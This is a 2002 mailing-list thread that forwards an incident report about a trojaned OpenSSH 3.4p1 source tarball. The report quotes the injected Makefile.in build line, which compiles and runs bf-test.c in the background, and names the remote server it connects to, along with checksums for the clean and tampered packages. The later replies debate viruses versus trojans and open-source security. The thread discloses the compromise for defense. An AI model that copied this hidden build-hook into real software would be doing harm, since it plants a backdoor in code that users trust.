Loading ...
Sorry, an error occurred while loading the content.

openssh-3.4p1.tar.gz distribution recently trojaned

Expand Messages
  • Godwin Stewart
    X-POSTED to: BeginningWithLinux@yahoogroups.com linux@yahoogroups.com LINUX_Newbies@yahoogroups.com Linux-Anyway@freelists.org From
    Message 1 of 5 , Aug 1, 2002
    • 0 Attachment
      X-POSTED to:

      BeginningWithLinux@yahoogroups.com
      linux@yahoogroups.com
      LINUX_Newbies@yahoogroups.com
      Linux-Anyway@...



      From
      http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

      ----- Forwarded message from Edwin Groothuis <edwin@...> -----

      Date: Thu, 1 Aug 2002 16:55:51 +1000
      From: Edwin Groothuis <edwin@...>
      To: incidents@...
      Subject: openssh-3.4p1.tar.gz trojaned

      Greetings,

      Just want to inform you that the OpenSSH package op ftp.openbsd.org
      (and probably all its mirrors now) it trojaned:

      ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

      The OpenBSD people have been informed about it (via email to
      deraadt@... and via irc.openprojects.org/#openbsd)


      The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
      all: libopenbsd-compat.a
      + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
      ../bf-test.out &

      bf-test.c[1] is nothing more than a wrapper which generates a
      shell-script[2] which compiles itself and tries to connect to an
      server running on 203.62.158.32:6667 (web.snsonline.net).

      [1] http://www.mavetju.org/~edwin/bf-test.c
      [2] http://www.mavetju.org/~edwin/bf-output.sh

      This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
      ports system:
      MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

      This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
      MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

      --
      Seen in the classified ads:
      NICE PARACHUTE: NEVER OPENED - USED ONCE
      ____________________________________________
      | G. Stewart -- gstewart@... |
      | gstewart@... |
      |--------------------------------------------|
      | Linux User Group de Touraine |
      | http://www.lug-touraine.org |
      ____________________________________________
    • Mohsin Khan
      I thought that Linux had no viruses? ... http://docs.yahoo.com/info/terms/
      Message 2 of 5 , Aug 1, 2002
      • 0 Attachment
        I thought that Linux had no viruses?


        > -----Original Message-----
        > From: Godwin Stewart [mailto:gstewart@...]
        > Sent: Thursday, August 01, 2002 2:41 PM
        > To: Beginning With Linux; Linux list; Linux Newbies; Linux-Anyway
        > Subject: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently
        > trojaned
        >
        > X-POSTED to:
        >
        > BeginningWithLinux@yahoogroups.com
        > linux@yahoogroups.com
        > LINUX_Newbies@yahoogroups.com
        > Linux-Anyway@...
        >
        >
        >
        > From
        > http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-
        > security
        >
        > ----- Forwarded message from Edwin Groothuis <edwin@...> -----
        >
        > Date: Thu, 1 Aug 2002 16:55:51 +1000
        > From: Edwin Groothuis <edwin@...>
        > To: incidents@...
        > Subject: openssh-3.4p1.tar.gz trojaned
        >
        > Greetings,
        >
        > Just want to inform you that the OpenSSH package op ftp.openbsd.org
        > (and probably all its mirrors now) it trojaned:
        >
        > ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-
        > 3.4p1.tar.gz
        >
        > The OpenBSD people have been informed about it (via email to
        > deraadt@... and via irc.openprojects.org/#openbsd)
        >
        >
        > The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
        > all: libopenbsd-compat.a
        > + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
        > ../bf-test.out &
        >
        > bf-test.c[1] is nothing more than a wrapper which generates a
        > shell-script[2] which compiles itself and tries to connect to an
        > server running on 203.62.158.32:6667 (web.snsonline.net).
        >
        > [1] http://www.mavetju.org/~edwin/bf-test.c
        > [2] http://www.mavetju.org/~edwin/bf-output.sh
        >
        > This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
        > ports system:
        > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
        >
        > This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
        > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
        >
        > --
        > Seen in the classified ads:
        > NICE PARACHUTE: NEVER OPENED - USED ONCE
        > ____________________________________________
        > | G. Stewart -- gstewart@... |
        > | gstewart@... |
        > |--------------------------------------------|
        > | Linux User Group de Touraine |
        > | http://www.lug-touraine.org |
        > ____________________________________________
        >
        > ------------------------ Yahoo! Groups Sponsor
        >
        > To unsubscribe from this list, please email LINUX_Newbies-
        > unsubscribe@yahoogroups.com & you will be removed.
        >
        > Your use of Yahoo! Groups is subject to
        http://docs.yahoo.com/info/terms/
        >
      • Horror Vacui
        ... Yes, you thought so and have all the right in the world to continue doing it. A trojan is not a virus. Viruses are snippets of programming code that can
        Message 3 of 5 , Aug 1, 2002
        • 0 Attachment
          Mohsin Khan wrote:

          >I thought that Linux had no viruses?
          >

          Yes, you thought so and have all the right in the world to continue
          doing it. A trojan is not a virus. Viruses are snippets of programming
          code that can perform tasks like deleting or infecting files, formatting
          disks, sending mail, perhaps most importantly spread themselves... A
          trojan is just malicious code in a program that gathers informations
          it's programmed to gather, and send it to somebody. It's a way for
          crackers to sneak into your system and get access to informations they
          can't get from the outside. This one appears to be quite serious,
          because you often use ssh as root - therefore the trojan can access and
          betray any information root has access to, and that means quite anything.

          Nobody ever said that Open Source is impossible to crack. People will
          always try, and some will succeed. The difference between Open Source
          and proprietary software though, the significant difference that makes
          Open Source more secure, is the way such things are handled. Right at
          the moment, any peace of Open Source software you're using is being
          hacked by hundreds of friendly geeks trying to make it better for you,
          and if some unfriendly geek puts something into it to damage you, the
          friendly ones are very likely to notice right away, and being friendly,
          they invariably yell "FIRE" the moment they smell the smoke even if
          they're ashamed because of it. Proprietary software is controlled by
          much less people, some of them on starving wages, much less enthusiastic
          and much less likely to find a vulnerability. When they do, the company
          they work for is very unlikely to say "We've sold you malicious code,
          have a patch right away" - it's bad for the business. Hence the
          institution of Microsoft Service Packs, mending the worse failings and
          covering up others without you being informed explicitly what it does
          (naming the flaw). They sell it off as a service to make customers'
          software better, instead of admitting they made a mistake and are just
          correcting it.

          My thanks to friendly geeks for the software, and for having the
          greatness to admit it when they mess up. Never mind, shit happens.


          Cheers
          Horror Vacui

          >
          >
          >
          >
          >>-----Original Message-----
          >>From: Godwin Stewart [mailto:gstewart@...]
          >>Sent: Thursday, August 01, 2002 2:41 PM
          >>To: Beginning With Linux; Linux list; Linux Newbies; Linux-Anyway
          >>Subject: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently
          >>trojaned
          >>
          >>X-POSTED to:
          >>
          >>BeginningWithLinux@yahoogroups.com
          >>linux@yahoogroups.com
          >>LINUX_Newbies@yahoogroups.com
          >>Linux-Anyway@...
          >>
          >>
          >>
          >>From
          >>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-
          >>security
          >>
          >>----- Forwarded message from Edwin Groothuis <edwin@...> -----
          >>
          >>Date: Thu, 1 Aug 2002 16:55:51 +1000
          >>From: Edwin Groothuis <edwin@...>
          >>To: incidents@...
          >>Subject: openssh-3.4p1.tar.gz trojaned
          >>
          >>Greetings,
          >>
          >>Just want to inform you that the OpenSSH package op ftp.openbsd.org
          >>(and probably all its mirrors now) it trojaned:
          >>
          >> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-
          >>3.4p1.tar.gz
          >>
          >>The OpenBSD people have been informed about it (via email to
          >>deraadt@... and via irc.openprojects.org/#openbsd)
          >>
          >>
          >>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
          >> all: libopenbsd-compat.a
          >>+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
          >>../bf-test.out &
          >>
          >>bf-test.c[1] is nothing more than a wrapper which generates a
          >>shell-script[2] which compiles itself and tries to connect to an
          >>server running on 203.62.158.32:6667 (web.snsonline.net).
          >>
          >>[1] http://www.mavetju.org/~edwin/bf-test.c
          >>[2] http://www.mavetju.org/~edwin/bf-output.sh
          >>
          >>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
          >>ports system:
          >> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
          >>
          >>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
          >> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
          >>
          >>--
          >>Seen in the classified ads:
          >>NICE PARACHUTE: NEVER OPENED - USED ONCE
          >> ____________________________________________
          >>| G. Stewart -- gstewart@... |
          >>| gstewart@... |
          >>|--------------------------------------------|
          >>| Linux User Group de Touraine |
          >>| http://www.lug-touraine.org |
          >> ____________________________________________
          >>
          >>------------------------ Yahoo! Groups Sponsor
          >>
          >>To unsubscribe from this list, please email LINUX_Newbies-
          >>unsubscribe@yahoogroups.com & you will be removed.
          >>
          >>Your use of Yahoo! Groups is subject to
          >>
          >>
          >http://docs.yahoo.com/info/terms/
          >
          >
          >
          >
          >
          >
          >
          >To unsubscribe from this list, please email LINUX_Newbies-unsubscribe@yahoogroups.com & you will be removed.
          >
          >Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
          >
          >
          >
          >
          >
          >
        • Andres Rosado
          ... Linux has virus, but not they usually don t propagete as fast as most Windows virus. ... Andres Rosado Email: andresr@despammed.com ICQ: 66750646 Homepage:
          Message 4 of 5 , Aug 2, 2002
          • 0 Attachment
            At 03:08 PM 8/1/2002 +0100, you wrote:
            >I thought that Linux had no viruses?

            Linux has virus, but not they usually don't propagete as fast as most
            Windows virus.


            -----------------------------------
            Andres Rosado
            Email: andresr@...
            ICQ: 66750646
            Homepage: http://andres980.tripod.com/

            The more we disagree, the more chance there is that at least one of us
            is right.
          • Godwin Stewart
            On Fri, 02 Aug 2002 20:11:19 -0400, Andres Rosado ... You obviously didn t read a reply sent to this list a couple of days ago: Yes, you
            Message 5 of 5 , Aug 3, 2002
            • 0 Attachment
              On Fri, 02 Aug 2002 20:11:19 -0400, Andres Rosado <arosado@...>
              wrote to LINUX_Newbies@yahoogroups.com:

              > Linux has virus, but not they usually don't propagete as fast as most
              > Windows virus.

              You obviously didn't read a reply sent to this list a couple of days ago:

              Yes, you thought so [that there were no Linux viruses] and have all the
              right in the world to continue doing it. A trojan is not a virus. Viruses
              are snippets of programming code that can perform tasks like deleting or
              infecting files, formatting disks, sending mail, perhaps most importantly
              spread themselves... A trojan is just malicious code in a program that
              gathers informations it's programmed to gather, and send it to somebody.
              It's a way for crackers to sneak into your system and get access to
              informations they can't get from the outside. This one appears to be quite
              serious, because you often use ssh as root - therefore the trojan can access
              and betray any information root has access to, and that means quite
              anything.

              Nobody ever said that Open Source is impossible to crack. People will
              always try, and some will succeed. The difference between Open Source
              and proprietary software though, the significant difference that makes
              Open Source more secure, is the way such things are handled. Right at
              the moment, any peace of Open Source software you're using is being
              hacked by hundreds of friendly geeks trying to make it better for you,
              and if some unfriendly geek puts something into it to damage you, the
              friendly ones are very likely to notice right away, and being friendly,
              they invariably yell "FIRE" the moment they smell the smoke even if
              they're ashamed because of it. Proprietary software is controlled by
              much less people, some of them on starving wages, much less enthusiastic
              and much less likely to find a vulnerability. When they do, the company
              they work for is very unlikely to say "We've sold you malicious code,
              have a patch right away" - it's bad for the business. Hence the
              institution of Microsoft Service Packs, mending the worse failings and
              covering up others without you being informed explicitly what it does
              (naming the flaw). They sell it off as a service to make customers'
              software better, instead of admitting they made a mistake and are just
              correcting it.

              My thanks to friendly geeks for the software, and for having the
              greatness to admit it when they mess up. Never mind, shit happens.

              Signed: Horror Vacui

              --
              In the 60's people took acid to make the world weird.
              Now the world is weird and people take Prozac to make
              it normal.
              ____________________________________________
              | G. Stewart -- gstewart@... |
              | gstewart@... |
              |--------------------------------------------|
              | Linux User Group de Touraine |
              | http://www.lug-touraine.org |
              ____________________________________________
            Your message has been successfully submitted and would be delivered to recipients shortly.